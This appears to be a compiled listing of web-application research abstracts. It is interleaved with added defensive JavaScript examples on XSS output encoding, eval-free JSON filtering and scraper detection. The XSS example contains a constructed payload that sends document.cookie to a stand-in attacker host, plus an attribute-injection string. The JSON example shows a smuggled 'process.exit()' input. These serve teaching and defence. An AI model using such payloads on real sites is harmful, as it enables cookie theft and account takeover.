An OWASP Top Ten Driven Survey on Web Application Protection Methods

2020 ◽  
Author(s):  
Ouissem Ben Fredj ◽  
Omar Cheikhrouhou ◽  
Moez Krichen ◽  
Habib Hamam ◽  
Abdelouahid Derhab

Web applications (WAs) are constantly evolving and deployed at a broad scale. However, they are exposed to a variety of attacks. The biggest challenge facing organizations is how to develop a WA that fulfills their requirements with respect to sensitive data exchange, E-commerce, and secure workflows. This paper identifies the most critical web vulnerabilities according to the OWASP Top Ten, their corresponding attacks, and their countermeasures. The application of these countermeasures will guarantee the protection of the WAs against the most severe attacks and prevent several unknown exploits.


2020 ◽  
Vol 8 (6) ◽  
pp. 5279-5281

XSS is one of the most common vulnerabilities affecting web applications. XSS attacks are essentially malicious client-side injections that are added to a web page or app through user comments, form submissions, and so on. The main danger behind XSS is that it allows attackers to inject content into the online app. The injected content can modify how the page is displayed, forcing the browser to execute the attacker's code. Web vulnerability scanners are developed to scan the whole web page of Internet sites. Vulnerability assessment is the process of identifying vulnerabilities in your application's environment. A vulnerability is defined as a weakness or flaw within the system that permits an attacker or insider to access the system in a way they are not authorized to.
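The abstract describes the mechanism (user-supplied text reaches the page as markup, so the browser runs the attacker's script) without showing it. The following is an added example, not code from the paper: a server-side comment template in its vulnerable form next to the same template with contextual output encoding, run over a constructed attacker payload. The tag-counting helper is an illustrative check, not a production XSS filter; the real defence is that the encoded output contains no tags the template did not emit itself.

```javascript
// Added example (not from the surveyed paper): stored/reflected XSS in a
// server-side comment template, and the output encoding that neutralises it.
// Plain Node.js, no dependencies.

// Constructed attacker input: what a user might submit through a comment form.
// The author field attacks the attribute context, the body attacks the text context.
const ATTACKER_COMMENT = {
  author: 'mallory" onmouseover="alert(document.cookie)',
  body: '<script>fetch("https://evil.example/?c=" + document.cookie)</script>',
};

// Vulnerable: user-controlled strings are concatenated straight into HTML.
// The browser cannot distinguish the attacker's tags from the template's own.
function renderCommentUnsafe(c) {
  return `<div class="comment" data-author="${c.author}">${c.body}</div>`;
}

// Hardened: encode the five characters that change meaning in HTML text and
// double-quoted attribute contexts. Escaping the quote closes the attribute
// injection path; escaping < and > closes the tag injection path.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[ch]);
}

function renderCommentSafe(c) {
  return `<div class="comment" data-author="${escapeHtml(c.author)}">${escapeHtml(c.body)}</div>`;
}

// Illustrative structural check: count tag openers in the rendered output.
// After encoding, only the template's own <div> and </div> remain.
function countTags(html) {
  return (html.match(/<[a-zA-Z!\/]/g) || []).length;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderCommentUnsafe(ATTACKER_COMMENT));
  console.log('safe:  ', renderCommentSafe(ATTACKER_COMMENT));
}
```

Note that the encoding is only correct for the two contexts this template uses (element text and a double-quoted attribute). Inserting user data into a `<script>` block, a URL, or an unquoted attribute needs a different encoder, which is why the usual advice is to pick a templating engine that encodes by default and treat raw-output markers as security-relevant code.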


Author(s):  
Atul Jain ◽  
ShashiKant Gupta

JavaScript Object Notation (JSON) is a text-based data exchange format for structuring data between a server and a client-side web application. It is basically a data format, so it is not limited to Ajax-style web applications and can be used with APIs to exchange or store information. However, the whole data set is never used by the system or application; it needs to extract a piece according to a requirement that may vary from person to person and over time. Searching and filtering a JSON string are very typical operations, yet most studies give only basic operations for querying data from a JSON object. The aim of this paper is to find out all the methods, across different technologies, for searching and filtering JSON data. It explains the extensive results of previous research on the JSONiq FLWOR expression and compares it with the json-query module of npm for extracting information from JSON. This research intends to retrieve data from JSON with some advanced operators with the help of a prototype in the json-query package of NodeJS. Thus, the data can be filtered more efficiently and accurately without the need for any other programming language dependency. The main objective is to filter JSON data in the same way as an SQL query.
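The abstract's goal of SQL-style filtering over JSON is easy to get wrong from a security standpoint: the quickest implementations build a predicate string and hand it to `eval()` or `new Function()`, which turns a user-supplied filter into code execution. The following is an added example, not the paper's prototype and not the json-query module: a small `WHERE`-clause evaluator that parses the condition itself, compares only same-typed values, and resolves field paths through own-property lookups so a filter cannot reach `__proto__` or `constructor`. The order records are constructed sample data.

```javascript
// Added example (not from the paper, which uses JSONiq and the json-query npm
// module): an eval-free SQL-style WHERE evaluator over a JSON array.

// Constructed sample data.
const CONSTRUCTED_ORDERS = [
  { id: 1, customer: 'alice', total: 120.5, status: 'paid' },
  { id: 2, customer: 'bob', total: 35, status: 'pending' },
  { id: 3, customer: 'carol', total: 980, status: 'paid' },
  { id: 4, customer: 'dave', total: 15.25, status: 'refunded' },
];

// Grammar: cond ( AND cond )*; cond := field OP literal;
// OP in =, !=, >, >=, <, <=; literal is a number or a single-quoted string.
// Anything outside this grammar is rejected rather than interpreted.
const COND_RE = /^\s*([A-Za-z_][\w.]*)\s*(>=|<=|!=|=|>|<)\s*('((?:[^'\\]|\\.)*)'|-?\d+(?:\.\d+)?)\s*$/;

function parseWhere(where) {
  return where.split(/\s+AND\s+/i).map((part) => {
    const m = COND_RE.exec(part);
    if (!m) throw new Error(`bad condition: ${JSON.stringify(part)}`);
    // m[4] is the unquoted string body (undefined for numeric literals).
    const value = m[4] !== undefined ? m[4].replace(/\\(.)/g, '$1') : Number(m[3]);
    return { field: m[1], op: m[2], value };
  });
}

// Resolve a dotted path using own properties only, so a filter string cannot
// walk into __proto__, constructor or other inherited members.
function getPath(obj, path) {
  let cur = obj;
  for (const key of path.split('.')) {
    if (cur === null || typeof cur !== 'object' || !Object.prototype.hasOwnProperty.call(cur, key)) {
      return undefined;
    }
    cur = cur[key];
  }
  return cur;
}

const OPS = {
  '=': (a, b) => a === b,
  '!=': (a, b) => a !== b,
  '>': (a, b) => a > b,
  '>=': (a, b) => a >= b,
  '<': (a, b) => a < b,
  '<=': (a, b) => a <= b,
};

// SELECT columns FROM rows WHERE where. Mixed-type comparisons (string field
// against numeric literal) are treated as non-matching instead of coerced.
function select(rows, where, columns) {
  const conds = parseWhere(where);
  return rows
    .filter((row) => conds.every((c) => {
      const actual = getPath(row, c.field);
      return actual !== undefined && typeof actual === typeof c.value && OPS[c.op](actual, c.value);
    }))
    .map((row) => (columns ? Object.fromEntries(columns.map((k) => [k, getPath(row, k)])) : row));
}
```

Usage: `select(CONSTRUCTED_ORDERS, "status = 'paid' AND total > 100", ['id'])` returns the paid orders above 100 projected to their ids, and `select(CONSTRUCTED_ORDERS, "status = 'paid'; process.exit()")` throws at parse time instead of doing anything with the trailing code. Extending the grammar (OR, parentheses, IN) means extending the parser, never falling back to `eval`.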


2017 ◽  
Vol 4 (4) ◽  
pp. 66-81
Author(s):  
Mohit Chawla ◽  
Siba Mishra ◽  
Kriti Singh ◽  
Chiranjeev Kumar

While web applications continue to employ the traditional client-server model, most current applications demand real-time bi-directional communication. In such setups, data exchanges between the two parties (client and server) are very frequent. Thus, the performance of the network is subject to various factors decided by the choice of data exchange mechanism, which shows that this choice is vital to the performance of a web application employing it. This paper compares various data exchange mechanisms with respect to the factors affecting real-time web applications. While the absolute benchmark values may vary between systems, the relative differences between them can be used as a reference for selecting a mechanism for an application. Hence, this paper can be used as a reference for choosing an appropriate data exchange mechanism for the application concerned.


2006 ◽  
Vol 3 (2) ◽  
pp. 83-96 ◽  
Author(s):  
Bojan Jovicic ◽  
Dejan Simic

Web application security is one of the most daunting tasks today, because of the shift of security from the lower levels of the ISO OSI model to the application level, and because of the current situation in the IT environment. ASP.NET offers powerful mechanisms to render these attacks futile, but it requires some knowledge of implementing Web application security. This paper focuses on attacks against Web applications, whether to gain direct benefit by collecting private information or to disable target sites. It describes the two most common Web application attacks, SQL Injection and Cross Site Scripting, and is based on the authors' long-standing experience in Web application security. It explains how to use ASP.NET to provide Web application security. Some principles of strong Web application security make up part of the defense mechanisms presented: executing with a least-privileged account, securing sensitive data (the connection string) and proper exception handling (where a new approach is presented using ASP.NET mechanisms for centralized exception logging and presentation). These principles help raise the bar that an attacker has to cross and consequently contribute to better security.


Author(s):  
Rizwan Ur Rahman ◽  
Danish Wadhwa ◽  
Aakash Bali ◽  
Deepak Singh Tomar

Web scraping is the technique used to automatically obtain particular information from web applications instead of manually copying it. The purpose of a web scraper is to search for a certain class of information, extract it, and aggregate it into a new database. More precisely, web scrapers are used to transform unstructured web data and store it in structured databases. It is a continuing threat to web applications that aims to steal sensitive data from a victim or from web applications. The key objective of this article is to examine to what extent web scraping can pose a threat to web application security. The article explores the classification of web scraping, such as content scraping, web scraping, price scraping, and database scraping, in general, and presents the most widely used scraping tools such as Web Content Extractor and Screen Scraper. Consequently, the aim of this article is to give an evaluation of the vulnerabilities and threats of web scraping associated with web applications, and effective measures to counter them.
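The abstract promises countermeasures without naming them. One detection-side measure that a practitioner would reach for first is shown below as an added example (not from the article): two cheap signals computed from web-server access logs, a per-client request rate over a sliding window and monotonic enumeration of a resource identifier, which is how price and database scrapers typically walk a catalogue. The log lines, the thresholds and the `/product/<id>` path shape are all constructed for the example; the parsing regex assumes a simplified `ip timestamp method path` line format, not the real Common Log Format.

```javascript
// Added example (not from the article): scraper detection signals over
// constructed access-log lines. Plain Node.js, no dependencies.

// Constructed sample log: one enumerating scraper, one bursty client, one human.
const CONSTRUCTED_LOG = `
203.0.113.7 2024-05-01T10:00:00Z GET /product/1001
203.0.113.7 2024-05-01T10:00:01Z GET /product/1002
203.0.113.7 2024-05-01T10:00:02Z GET /product/1003
203.0.113.7 2024-05-01T10:00:03Z GET /product/1004
203.0.113.7 2024-05-01T10:00:04Z GET /product/1005
203.0.113.7 2024-05-01T10:00:05Z GET /product/1006
203.0.113.7 2024-05-01T10:00:06Z GET /product/1007
203.0.113.7 2024-05-01T10:00:07Z GET /product/1008
198.51.100.3 2024-05-01T10:00:00Z GET /product/2044
198.51.100.3 2024-05-01T10:00:45Z GET /product/2045
198.51.100.3 2024-05-01T10:02:30Z GET /cart
198.51.100.3 2024-05-01T10:03:00Z GET /product/2100
192.0.2.9 2024-05-01T10:01:00Z GET /search?q=a
192.0.2.9 2024-05-01T10:01:00Z GET /search?q=b
192.0.2.9 2024-05-01T10:01:01Z GET /search?q=c
192.0.2.9 2024-05-01T10:01:01Z GET /search?q=d
192.0.2.9 2024-05-01T10:01:02Z GET /search?q=e
192.0.2.9 2024-05-01T10:01:03Z GET /search?q=f
`;

// Simplified line format assumed for the example: "ip ISO-timestamp METHOD path".
const LINE_RE = /^(\S+) (\S+) (GET|POST|HEAD) (\S+)$/;

function parseLog(text) {
  return text.trim().split('\n').map((line) => {
    const m = LINE_RE.exec(line.trim());
    if (!m) throw new Error(`unparseable line: ${line}`);
    return { ip: m[1], ts: Date.parse(m[2]), path: m[4] };
  });
}

// Largest number of requests from one client inside any window of windowMs
// (two-pointer sweep over the sorted timestamps).
function peakRequestsInWindow(timestamps, windowMs) {
  const ts = [...timestamps].sort((a, b) => a - b);
  let best = 0;
  for (let i = 0, j = 0; j < ts.length; j++) {
    while (ts[j] - ts[i] > windowMs) i++;
    best = Math.max(best, j - i + 1);
  }
  return best;
}

// Longest run of consecutive requests whose /product/<id> increases by exactly 1.
// Non-product requests break the run.
function longestSequentialRun(paths) {
  let best = 0, run = 0, prev = null;
  for (const p of paths) {
    const m = /^\/product\/(\d+)$/.exec(p);
    const id = m ? Number(m[1]) : null;
    run = (id !== null && prev !== null && id === prev + 1) ? run + 1 : (id !== null ? 1 : 0);
    best = Math.max(best, run);
    prev = id;
  }
  return best;
}

// Per-client report; thresholds are example values and must be tuned per site.
function analyzeAccessLog(text, { windowMs = 10000, maxPerWindow = 5, minRun = 5 } = {}) {
  const byIp = new Map();
  for (const e of parseLog(text)) {
    if (!byIp.has(e.ip)) byIp.set(e.ip, []);
    byIp.get(e.ip).push(e);
  }
  const report = {};
  for (const [ip, entries] of byIp) {
    entries.sort((a, b) => a.ts - b.ts);
    const peak = peakRequestsInWindow(entries.map((e) => e.ts), windowMs);
    const run = longestSequentialRun(entries.map((e) => e.path));
    const reasons = [];
    if (peak > maxPerWindow) reasons.push(`rate ${peak}/${windowMs / 1000}s`);
    if (run >= minRun) reasons.push(`sequential ids x${run}`);
    report[ip] = { requests: entries.length, peak, run, flagged: reasons.length > 0, reasons };
  }
  return report;
}
```

Rate alone produces false positives (shared NAT egress, aggressive prefetching), which is why the enumeration signal is worth keeping separate: a client that is both fast and walking ids in order is a much stronger scraper indicator than either signal on its own. Keying on IP also assumes the scraper is not rotating through a proxy pool; session or fingerprint keys are the usual next step.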


Author(s):  
Arijit Sengupta ◽  
Henry Kim

We present SWAP (Semantic Web application pyramid), a framework for incorporating ontologies in data-oriented semantic Web applications. We have implemented this framework with a measurement ontology for a quality management Web service. This quality management Web service is built on top of a set of XML Web services implementing agents representing quality management clients, quality management servers, and vendors. SWAP facilitates data exchange between these Web services with vendor data stored in databases, and the processing of the data using a combination of RuleML and SQL. The testbed implementation demonstrates the feasibility and scalability of the framework for any type of three-tier ontology-based semantic Web applications involving low to moderate data exchange. We discuss methods for improving this framework for high data exchange volumes as well. The primary contribution of this framework is in the component-based implementation of real-world semantic Web applications.


Author(s):  
Maksim Valer'evich Votinov

The article focuses on the development of telecommunication functions providing remote control of technological processes, their visualization, and the actuators of different processing facilities (e.g. the actuators of a small-size dryer created at Murmansk State Technical University to smoke and dry fish). The solution became possible due to a web application developed with ASP (Active Server Pages) technology and run on top of a web server controlled by Microsoft IIS (Internet Information Services). The advantage of the web application is that it allows logging onto the automated control system irrespective of the small-size dryer's location (i.e. the workplace is mobile), and control of the technological process is possible from any mobile platform and operating system. Using MS SQL Server Express made it possible to organize nonstop data exchange between the automatic system of the small dryer and the end user (simultaneous work of several users is possible). The article presents the scheme of the user and web application interface. The security class of the project (III) has been determined, as well as the corresponding basic protection measures, which provide for implementing user identification and authentication, antivirus and network intrusion systems. Project costs proved to be lower than the cost of the TRACE MODE Data Center software (35,000 rubles instead of 58,000 rubles), which is considered a truly sustainable solution for realizing remote access to the automation facility. A growing number of users does not affect the final cost of the project.


Cyber security refers to a set of well-defined techniques used to protect the integrity of networks. It is used to protect the vital data of customers and to restrict unauthorised access. In the era of E-Commerce, the demand for websites and web applications is increasing exponentially day by day. Web security is currently a significant issue for Internet-enabled organizations, which manage information digitally through websites. HTTP, the Hypertext Transfer Protocol, is used to transfer information over the Internet. HTTP is the most popular protocol in web applications and is allowed by Internet firewalls and operating systems. HTTP is an unsecured information exchange protocol: there is no integrity protection, so someone can easily alter the content. On the Internet, data is transferred over an HTTP connection in plain text, which opens a new loophole for attackers to read every piece of data sent over the HTTP connection to the web server. HTTP is insecure because it has no encryption. So it is subject to web attacks such as man-in-the-middle, cross-site scripting, SQL injection, clickjacking, and broken authentication and session management attacks. HTTP's interaction with TCP is bad and causes problems with performance and server scalability. In our proposed system, when a document is used by more than one user and its content is updated, the user modifying the content of the shared document must obtain the consent of the other users. The process used to authenticate modifications to the content of the shared document is based on a shared key: unless and until all users send their shared keys, the document will not be decrypted, and hence further changes to the document will not be possible.


2012 ◽  
Vol 2 (2) ◽  
pp. 112-116
Author(s):  
Shikha Bhatia ◽  
Mr. Harshpreet Singh

With the mounting demand for web applications, a number of issues related to their quality have come into existence. In the field of web applications, it is very difficult to develop high-quality web applications. A design pattern is a general, repeatable solution to a commonly occurring problem in software design. It should be noted that a design pattern is not a finished product that can be directly transformed into source code. Rather, a design pattern is a description or template that describes how to solve a problem that can be used in many different situations. Past research has shown that design patterns greatly improved the execution speed of a software application. Design patterns are classified as creational design patterns, structural design patterns, behavioral design patterns, etc. The MVC design pattern is very productive for architecting interactive software systems and web applications. This design pattern is partition-independent, because it is expressed in terms of an interactive application running in a single address space. We will design and analyze an algorithm using the MVC approach to improve the performance of a web-based application. The objective of our study is to reduce one of the major object-oriented features, i.e. coupling between the model and view segments of a web-based application. The implementation will be done using the .NET framework.

